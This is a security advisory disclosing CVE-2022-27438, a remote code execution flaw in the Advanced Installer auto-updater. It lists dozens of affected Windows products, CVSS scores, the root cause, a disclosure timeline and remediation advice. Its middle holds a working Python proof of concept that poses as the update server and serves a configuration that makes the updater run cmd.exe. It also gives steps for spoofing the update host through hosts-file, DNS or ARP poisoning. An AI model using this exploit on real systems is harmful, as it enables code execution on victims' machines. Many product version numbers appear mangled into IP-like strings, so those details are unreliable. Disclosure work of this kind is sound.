Caphyon Ltd Advanced Installer 19.3 “CustomDetection” Update Check Remote Code Execution Vulnerability (PDF)
- Title: Caphyon Ltd Advanced Installer 19.3 “CustomDetection” Update Check Remote Code Execution Vulnerability
- Vendor Advisory: Important Security Updates for the Advanced Installer Auto Updater
- Release mode: Coordinated Release
- Class: Download of Code Without Integrity Check [CWE-494]
- Affected Products: Advanced Installer 19.3 and earlier, and all products that use the updater from Caphyon Ltd Advanced Installer, Advanced Updater.
- Remotely Exploitable: Yes
- Locally Exploitable: Yes
- Severity: Critical - 9.6 (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
- CVE Identifier: CVE-2022-27438
- Products tested to be vulnerable:
- 3CX Ltd Call Flow Designer 18.2.13 (TLS)
- 3CX Ltd CRM Template Generator 2.1.23 (TLS)
- BoomTV Inc Streamer Portal 2.2.1 (TLS)
- Caphyon Ltd Advanced Installer 19.3 (TLS)
- Code Sector Direct Folders 4.0 (TLS)
- Code Sector TeraCopy 3.8.5 (TLS)
- Emurasoft Inc EmEditor 21.3.0
- ESI Technology Ltd ESI-USB Software 220.127.116.11
- Flamory Flamory 18.104.22.168 (TLS/elevated)
- Freesnippingtool.com Free Snipping Tool 22.214.171.124 (TLS)
- FxSound LLC FxSound 126.96.36.199 (TLS)
- Gainedge Software Better Explorer 2020.3.15.1304 (TLS)
- Gamecaster Pte Ltd Gamecaster 4.0.2109.2802 (TLS/elevated)
- GuzoGo Travel PLC GuzoGo: Compare and Book Flight Tickets 188.8.131.52
- Honeygain Honeygain for Windows 0.10.7.0 (TLS)
- JKI Soft VI Package Manager 21.1.2754
- JP Software Inc Take Command 28.2.18 (TLS)
- KRyLack Software KRyLack Archive Password Recovery 3.70.69
- KRyLack Software Asterisks Password Decryptor 3.31.107
- KRyLack Software Burning Suite 1.20.05
- KRyLack Software RAR Password Recovery 3.70.69
- KRyLack Software Volume Serial Number Editor 2.02.34
- KRyLack Software ZIP Password Recovery 3.70.69
- Mailbird Inc Mailbird 184.108.40.206 (TLS)
- Moon Software Password Agent 20.10.1
- Nefarius Software Solutions e.U. ScpToolkit 220.127.116.1110 (TLS)
- Nefarius Software Solutions e.U. ViGEm Bus Driver 1.16.116 (TLS)
- Parade Technologies Ltd USB 3.0 to VGA/DVI/HDMI Driver 2.1.36287.0
- Plagiarism Checker X 8.0.6 (TLS)
- Prusa Research a.s. Slicer 2.4.2 (TLS)
- RealDefense LLC MyCleanID 4.1.4 (elevated)
- RealDefense LLC MyCleanPC 4.0.2 (TLS/elevated)
- RealDefense LLC MyPassLock 1.9.6
- Rovio Entertainment Ltd Angry Birds Space 1.4.1
- Rovio Entertainment Ltd Bad Piggies 1.3.0
- RST Instruments Ltd DT Logger Host Software 18.104.22.168
- RST Instruments Ltd Inclinalysis Digital Inclinometer Software 2.48.9
- RST Instruments Ltd IPI Utility Software 1.05.0
- RST Instruments Ltd Readout Host Software 22.214.171.124
- RST Instruments Ltd RSTAR RTU Host Software 1.33.0
- RST Instruments Ltd Tilt Meter Host Software 1.20.1
- RST Instruments Ltd VW0420 Vibrating Wire Isolated Analog Interface Software 1.33.0
- SplitmediaLabs Ltd XSplit Express Video Editor 3.0.2001.801 (TLS)
- UrbanVPN VPN for Windows 2.2.5 (TLS)
- Virtual Desktop Inc Virtual Desktop Streamer 1.20.16 (TLS)
- VpnHood VpnHood Client for Windows 2.4.299 (TLS)
Affected products perform their update check either unauthenticated through HTTP or through TLS/HTTPS. Moreover, some updaters run as an administrative user at high integrity. As a result, depending on the affected product the CVSS differs.
Unauthenticated/HTTP, elevated: 9.6 (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
Unauthenticated/HTTP: 8.8 (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
TLS, elevated: 8.8 (CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)
TLS: 8.0 (CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
This vulnerability allows remote attackers to execute arbitrary code on the affected installations of Caphyon Ltd Advanced Installer and all products that use the updater from Caphyon Ltd Advanced Installer, Advanced Updater. A man-in-the-middle position is required to exploit this vulnerability. User interaction is required in that the Windows untrusted certificate security alert has to be proceeded (only for updaters using TLS).
The specific flaw exists in the updater of Advanced Installer, which insufficiently authenticates its update server. An attacker can spoof these update servers and leverage this vulnerability to execute code in the context of the current user.
Root Cause Analysis
The vulnerability is caused by the updater of Advanced Installer: Advanced Updater, part of Caphyon Ltd Advanced Installer.
From the Advanced Installer User Guide we find that the updater allows for specifying an alternate update check using the
CustomDetectionParameter in the requested update configuration.
By default, the update check is triggered automatically after starting the application and with a 2 day interval, and manually through the application menu or executing the update binary.
In the case of Advanced Installer 19.3, the update requests
https://www.advancedinstaller.com/downloads/updates.ini, which can contain a specified
CustomDetection (any binary on the local system) and
CustomDetectionParameter (its parameters), which the application executes in the context of the current user.
Proof of Concept
The below script is used as a proof of concept. For affected products that request an update over HTTP, skip the
ssl.wrap_socket call and change the port to 80.
#!/usr/bin/env python3 # Proof of concept script for Caphyon Ltd Advanced Installer "CustomDetection" Update Check Remote Code Execution Vulnerability # See report for details. # # Generate self-signed certificate using e.g. # > openssl req -new -x509 -keyout www.advancedinstaller.com.pem -out www.advancedinstaller.com.pem -days 365 -nodes -subj "/CN=www.advancedinstaller.com" # # Author: Gerr.re from http.server import BaseHTTPRequestHandler, HTTPServer import ssl # CustomDetection with CustomDetectionParams is executed after receiving the response. # Note that we set exitcode != 0 s.t. the updater thinks there is no new update (so no visual feedback on exploit). updateconfig = b''';aiu; [Update] Name = Caphyon Ltd Advanced Updater CustomDetection Update Check Remote Code Execution Vulnerability URL = http://example.com/doesnotmatter Size = 1024 CustomDetection = c:\windows\system32\cmd.exe CustomDetectionParams = /c "c:\windows\system32\calc.exe && exit 1" ''' class HTTPHandler(BaseHTTPRequestHandler): def do_GET(self): if "updates.ini" in self.path: self.send_response(200) self.end_headers() self.wfile.write(updateconfig) else: self.send_response(404) self.end_headers() if __name__ == "__main__": print("Running Server") try: httpd = HTTPServer(("0.0.0.0", 443), HTTPHandler) httpd.socket = ssl.wrap_socket(httpd.socket, server_side=True, certfile='www.advancedinstaller.com.pem', ssl_version=ssl.PROTOCOL_TLS) httpd.serve_forever() except KeyboardInterrupt: httpd.server_close()
This proof of concept was tested on target Windows 10 21H2 with Caphyon Ltd Advanced Installer 19.3 installed, and attacker Ubuntu 20.04.3 LTS.
Steps to reproduce
For other affected products, you have to change the update server and update configuration filename. These can often be found in the updater
.ini in the application installation directory.
- Install Advanced Installer 19.3;
- Set spoof
www.advancedinstaller.comto our attacker ip;
- For the proof of concept it is easiest to edit
c:\windows\system32\drivers\etc\hostson the target.
- Attackers may e.g. use:
- poorly configured routers/switches/DNS
- DNS spoof / cache poisoning
- ARP spoof / cache poisoning
- Attackers may e.g. use:
- For the proof of concept it is easiest to edit
- Generate self-signed certificates;
- e.g. using
openssl req -new -x509 -keyout www.advancedinstaller.com.pem -out www.advancedinstaller.com.pem -days 365 -nodes -subj "/CN=www.advancedinstaller.com"
- e.g. using
- Run the proof of concept script on the attacker;
- Start Advanced Installer to trigger update automatically, or
- wait for 2 days to trigger update automatically, or
- trigger update manually through the application menu/settings, or
- trigger update manually by starting the update application at
C:\Program Files (x86)\Caphyon\Advanced Installer 19.3\bin\x86\updater.exe;
- Proceed with the Windows untrusted certificate security alert (if applicable).
As a result, the binary specified in
CustomDetection with parameters specified in
CustomDetectionParameters is executed in the context of the current user.
The vulnerability presents itself because there is insufficient authentication from the update server. This vulnerability is fixed in Advanced Installer 19.4.
We recommend vendors of affected products to build the product using Advanced Installer 19.4 and release this update as soon as possible. Mention the update and CVE-2022-27438 in the changelog.
We recommend users of affected products to update to a fixed version as soon as possible. Refer to the website of the affected product for updates and changelogs (look for “CVE-2022-27438 fix”).
- 11-02-2022: Initial contact with the vendor via firstname.lastname@example.org.
- 21-02-2022: Vendor releases version 19.2 which is still vulnerable.
- 04-03-2022: Gerr.re sent reminder to email@example.com after no response.
- 18-03-2022: Gerr.re sent a request to Mitre for a CVE ID.
- 18-03-2022: Gerr.re sent final reminder to firstname.lastname@example.org after no response.
- 21-03-2022: Vendor releases version 19.3 which is still vulnerable.
- 21-03-2022: Vendor replies, requesting technical details.
- 21-03-2022: A draft report with technical details and a proof of concept application was sent to the vendor.
- 22-03-2022: Vendor acknowledges reception of technical details.
- 23-03-2022: Vendor confirms the vulnerability.
- 24-03-2022: Vendor shares release candidate 19.4 and requests a retest on the fixes.
- 25-03-2022: Gerr.re confirms the fixes and sends further security recommendations.
- 29-03-2022: Vendor sends questions regarding security recommendations.
- 06-04-2022: Gerr.re sends additional information to answer the questions.
- 26-04-2022: Vendor releases version 19.4 that includes the fixes.
- 28-04-2022: Mitre assigns CVE-2022-27438.
- 01-06-2022: Coordinated release.
- 12-06-2022: Gerr.re sends remarks regarding false assumptions made in the vendor advisory.
- 20-06-2022: Updated public advisory with link to vendor advisory.
The contents of this advisory are copyright © 2022 Gerr.re, and are licensed under a Creative Commons Attribution-NoDerivatives 4.0 International (CC BY-ND 4.0)